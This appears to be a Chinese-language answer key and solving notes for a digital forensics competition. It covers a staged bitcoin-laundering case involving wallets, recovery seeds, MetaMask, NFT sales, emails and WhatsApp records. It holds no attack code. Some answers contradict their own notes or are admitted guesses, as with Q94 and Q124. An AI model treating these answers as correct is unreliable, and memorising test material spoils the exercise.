94. [单选题] 承上题,检视上述的档案,当中有几个IP地址曾经尝试以 'root' 登入装置但因密码错误而不成功? (2分)
A. 2
B. 4
C. 5
D. 6
E. 8
E
错误时会出现这个指令
数了一下一共6个
95. [填空题] 根据装置的过往记录,'log_file' 是设在 'usr/rooney/' 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)
RECORD
搜索了一下发现只有这一个被删除了,所以但是不是这个目录的,但应该也是 RecoRd
106. [单选题] 朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)
A. MetaMask
B. Electrum
C. Trezor
D. 以上皆非
B
里面有一个可以软件,去网上搜了一下发现是比特币钱包
107. [填空题] 朗尼通过比特币替王景浩清洗黑钱,分析朗尼的计算机及手机,朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)
bc1q0r0l3lh63wy865cd560kn3uhjqrwggvty4zj8n
108. [单选题] 朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)
A. 1%
B. 4%
C. 7%
D. 10%
E. 15%
D
109. [单选题] 朗尼的计算机里有一个没被加密的比特币钱包,它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)
A. oppose
B. area
C. twice
D. roast
D
进入RC,查看种子
110. [单选题] 朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)
A. 1
B. 2
C. 3
D. 4
E. 5
E
一共有5个钱包,只有RC没有密码
111. [单选题] 朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里,这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)
A. DMG
B. PDF
C. ASD
D. ZIP
E. PNG
A
一个一个搜,第一个发现了这个,打开一看
打开word看到了之前保存的
112. [单选题] 朗尼在手机里有一个加密了的比特币钱包,他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)
A. Safepal
B. Metamask
C. Changelly
D. Opensea
C
在图片里面发现了这个
113. [单选题] 承上题,这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)
A. 2022-10-07 10:29时
B. 2022-10-07 11:06时
C. 2022-10-07 11:07时
D. 2022-10-07 13:54时
A
114. [单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 'MetaMask' ? (以时区UTC+8回答) (1分)
A. Chrome 2022-08-25 12:35时
B. Chrome 2022-10-07 14:29时
C. Firefox 2022-08-25 12:35时
D. Firefox 2022-10-07 14:29时
B
不能直接发现,但是我们发现他没有火狐,只有谷歌,然后去谷歌的下载揭秘按照这个文件
115. [单选题] 朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)
A. Ethereum
B. Polygon
C. Solana
D. Arbitrum
E. Klaytn
A
116. [单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)
A. 2022-10-07 14:47时
B. 2022-10-07 14:49时
C. 2022-10-07 14:52时
D. 2022-10-07 14:54时
B
查看谷歌历史记录,发现有关opensea和nft的记录
有这个marketplace的应该是放售,前面只是创建
117. [多选题] 朗尼的手机里,有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)
A. Metamask
B. Opensea
C. Safepal
D. YouTube
ABC
前两个我们通过上面做题发现有关,然后这个safepal不知道上网上查了一下,他是可以用于btc钱包的
118. [单选题] 朗尼的手机里,于2022-10-07,15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)
A. 登录 'Metamask'
B. 登录 'Opensea'
C. 屏幕截图 (Screen Capture)
D. 登录 'YouTube'
C
这是这段时间干的事情,发现了屏幕截图
119. [多选题] 承上题,从这个动作中能找到什么资讯? (1分)
A. Opensea.io
B. Ethereum Main Network
C. Your purchase is complete
D. Subtotal = 0.0253 ETH
E. Good Luck
ABCD
120. [填空题] 在朗尼的计算机旁找到 'MetaMask' 的密码是 'opensea741',找出朗尼计算机里的 'MetaMask' 中有多少加密货币余额? (不要输入 '.',以阿拉伯数字回答,如 0.137 需回答 0137) (2分)
找了半天没找到这个metamask,最后在谷歌里面发现了这个
0.0247
121. [填空题] 朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)
rooneychan19830801gmail.com
122. [填空题] 什么电邮账号曾接收过上述电邮地址发送的电邮?(不要输入答案中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)
kinghoo0w0gmailcom
是在给王景浩发的邮件是发的
123. [多选题]承上题,上述的电邮附件包含哪些类型的档案? (3分)
A. pdf
B. doc
C. png
D. txt
E. jpg
DE
正常解压出来是这个,但是是多选题,所以肯定少了东西
修复了一下压缩包发现了jpg图片
124. [填空题] 上述电邮附件里的文件,被遮蔽的英文单字是什么? (以大写英文回答) (3分)
去查看了一下那六个包的种子都没有发现这几个种子,所以猜测是回收站里的那个RC3,但是不知道密码
去仿真里面找种子字典,发现只有teach和beach
teach
蒙了一个teach,因为看图片更像是teach而不是beach
125. [填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed),计算朗尼在 'MetaMask' 使用的以太币 (Ethereum) 地址。 (提示: BIP-44 derivation path = m/44'/60'/0'/0/0) (以大写英文及阿拉伯数字回答) (3分)
2AAEAB9592B749CE6355ED19D048F86F5EA5D819
126. [单选题]在2022年9月28日18时51分 (UTC+8),朗尼曾经在手机用WhatsApp与王景浩对话,语句 [有灯,风扇经常在转], 回复这句话的相关语句是什么? (1分)
A. 你有推介吗?
B. 我之前放在你家的机械运作正常吗?
C. 有灯号 风扇有转动?
D. 帅吗?
C
127. [单选题] 朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)
A. 荃湾
B. 湾仔
C. 九龙城
D. 九龙塘
A
128. [填空题] 朗尼手机的 'WhatsApp' 号码是什么? ( 号 码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)
85259814785
129. [多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)
A. taiiphone
B. rooneyhome
C. Function Room
D. TP-Link
AC
130. [单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)
A. abcd5678
B. aaaa0000
C. rooney111
D. rdfu1234
D
1. [填空题] 在朗尼手机于2022年9月30日的 'WhatsApp' 对话里,有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 'VPN' 的租金? (以阿拉伯数字回答) (3分)
3000
找到音频,然后倒放
yaoyao